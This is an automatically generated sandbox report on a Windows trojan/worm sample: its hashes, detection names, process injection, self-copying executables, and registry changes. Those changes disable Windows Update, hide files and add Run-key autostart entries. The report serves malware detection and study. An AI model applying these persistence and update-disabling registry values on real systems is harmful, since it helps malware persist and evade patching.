Gen.Variant.Midie.35218_e046c539bd
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Midie.35218 (B) (Emsisoft), Gen:Variant.Midie.35218 (AdAware), WormVobfus.YR, VirusVirut.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: e046c539bd9731dbdf5471f28abfefe3
SHA1: 493694ce9fe975e6af564efd1fe1badbaa0b50e2
SHA256: e2632f5031ef1d7ef41ec56762615cbbabd69268c34dccbc849043715d21a695
SSDeep: 3072:jgSccsWlXCFLcVyg/G1YwohkFoN3Oo1 FvfS9CtJ/9v:jbDCuGNopCvfS9CVv
Size: 257943 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: SQW
Created at: 2004-09-12 12:55:29
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ntvdm.exe:3432
jxqol.exe:4052
The Trojan injects its code into the following process(es):
balab.exe:3320
gomoz.exe:364
qnsaog.exe:1748
haeusa.exe:3948
tiisoh.exe:3180
e046c539bd9731dbdf5471f28abfefe3.usr:2372
pyyog.exe:772
zmloof.exe:3272
naezuid.exe:3280
tiaikar.exe:2644
caqap.exe:2416
%original file name%.exe:452
jxqol.usr:2056
peaab.exe:3032
zebex.exe:2016
kpwod.exe:3804
tiaot.exe:1980
gaejoa.exe:1564
gmras.exe:2132
ngqey.exe:2220
laudew.exe:1532
yoosex.exe:2204
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process balab.exe:3320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\naezuid.exe (922290 bytes)
The process gomoz.exe:364 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\tiaot.exe (922290 bytes)
The process haeusa.exe:3948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\caqap.exe (922290 bytes)
The process tiisoh.exe:3180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\qnsaog.exe (922290 bytes)
The process e046c539bd9731dbdf5471f28abfefe3.usr:2372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\peaab.exe (922290 bytes)
The process pyyog.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\balab.exe (922290 bytes)
The process zmloof.exe:3272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\kpwod.exe (922290 bytes)
The process naezuid.exe:3280 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\haeusa.exe (922290 bytes)
The process tiaikar.exe:2644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\gomoz.exe (922437 bytes)
The process caqap.exe:2416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\gaejoa.exe (922290 bytes)
The process ntvdm.exe:3432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsAC9.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsADA.tmp (269 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsAC9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsADA.tmp (0 bytes)
The process %original file name%.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\e046c539bd9731dbdf5471f28abfefe3.usr (145155 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
C:\Users\"%CurrentUserName%"\peaab.exe (252752 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (45796 bytes)
C:\Users\"%CurrentUserName%"\jxqol.exe (252752 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.usr (0 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.usr (0 bytes)
C:\Users\"%CurrentUserName%"\peaab.usr (0 bytes)
C:\Users\"%CurrentUserName%"\jxqol.usr (0 bytes)
The process jxqol.exe:4052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\jxqol.usr (145155 bytes)
The process jxqol.usr:2056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\zebex.exe (922437 bytes)
The process peaab.exe:3032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\jxqol.exe (922290 bytes)
The process zebex.exe:2016 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\tiaikar.exe (922437 bytes)
The process kpwod.exe:3804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\laudew.exe (922290 bytes)
The process tiaot.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\ngqey.exe (922290 bytes)
The process gaejoa.exe:1564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\tiisoh.exe (922290 bytes)
The process gmras.exe:2132 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\pyyog.exe (922290 bytes)
The process ngqey.exe:2220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\yoosex.exe (922290 bytes)
The process laudew.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\gmras.exe (922290 bytes)
The process yoosex.exe:2204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\zmloof.exe (922290 bytes)
Registry activity
The process balab.exe:3320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"naezuid" = "C:\Users\"%CurrentUserName%"\naezuid.exe /X"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process gomoz.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiaot" = "C:\Users\"%CurrentUserName%"\tiaot.exe /P"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process haeusa.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"caqap" = "C:\Users\"%CurrentUserName%"\caqap.exe /Y"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process tiisoh.exe:3180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"qnsaog" = "C:\Users\"%CurrentUserName%"\qnsaog.exe /V"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process e046c539bd9731dbdf5471f28abfefe3.usr:2372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"peaab" = "C:\Users\"%CurrentUserName%"\peaab.exe /A"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process pyyog.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"balab" = "C:\Users\"%CurrentUserName%"\balab.exe /D"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process zmloof.exe:3272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"kpwod" = "C:\Users\"%CurrentUserName%"\kpwod.exe /k"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process naezuid.exe:3280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"haeusa" = "C:\Users\"%CurrentUserName%"\haeusa.exe /m"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process tiaikar.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gomoz" = "C:\Users\"%CurrentUserName%"\gomoz.exe /r"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process caqap.exe:2416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gaejoa" = "C:\Users\"%CurrentUserName%"\gaejoa.exe /T"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process jxqol.usr:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zebex" = "C:\Users\"%CurrentUserName%"\zebex.exe /G"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process peaab.exe:3032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"jxqol" = "C:\Users\"%CurrentUserName%"\jxqol.exe /v"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process zebex.exe:2016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiaikar" = "C:\Users\"%CurrentUserName%"\tiaikar.exe /I"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process kpwod.exe:3804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"laudew" = "C:\Users\"%CurrentUserName%"\laudew.exe /h"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process tiaot.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ngqey" = "C:\Users\"%CurrentUserName%"\ngqey.exe /P"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process gaejoa.exe:1564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"tiisoh" = "C:\Users\"%CurrentUserName%"\tiisoh.exe /y"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process gmras.exe:2132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"pyyog" = "C:\Users\"%CurrentUserName%"\pyyog.exe /z"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process ngqey.exe:2220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"yoosex" = "C:\Users\"%CurrentUserName%"\yoosex.exe /E"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process laudew.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"gmras" = "C:\Users\"%CurrentUserName%"\gmras.exe /k"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process yoosex.exe:2204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zmloof" = "C:\Users\"%CurrentUserName%"\zmloof.exe /u"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
MD5 | File path |
---|---|
ecac9dcad09e8601fe2db2d0dea58d22 | c:\Users\"%CurrentUserName%"\balab.exe |
2c68ea1bd50bbb8196f0e0bcdc21735d | c:\Users\"%CurrentUserName%"\caqap.exe |
3b40dda4a39cabec5861b5efba236656 | c:\Users\"%CurrentUserName%"\gaejoa.exe |
8853ff7e43fac42f140bc06daac2774b | c:\Users\"%CurrentUserName%"\gmras.exe |
a8f544a3e4af101d3586fcacd4dc5713 | c:\Users\"%CurrentUserName%"\gomoz.exe |
38435917a09baa120341a1d564898010 | c:\Users\"%CurrentUserName%"\haeusa.exe |
5a5c3bae8b6cae7a2c3260286d49bedf | c:\Users\"%CurrentUserName%"\jxqol.exe |
fcb9d9622f4b7ac23bcf1e24c25f5903 | c:\Users\"%CurrentUserName%"\jxqol.usr |
519c9e372fcc4254fe9bbe4e4081ee6a | c:\Users\"%CurrentUserName%"\kpwod.exe |
026cc777dee00ea0db82616d5084d90b | c:\Users\"%CurrentUserName%"\laudew.exe |
61dcc62ad1481dc67a6cc1facb132a38 | c:\Users\"%CurrentUserName%"\naezuid.exe |
72e85f27cebdccd79de9e0b851892d4f | c:\Users\"%CurrentUserName%"\ngqey.exe |
b3112c6ce11538ee17cd736c9921cb74 | c:\Users\"%CurrentUserName%"\peaab.exe |
4f80092d9684d0d505244383f2b0c610 | c:\Users\"%CurrentUserName%"\peaab.usr |
fad3edffc450964234e51d8006a6fd41 | c:\Users\"%CurrentUserName%"\pyyog.exe |
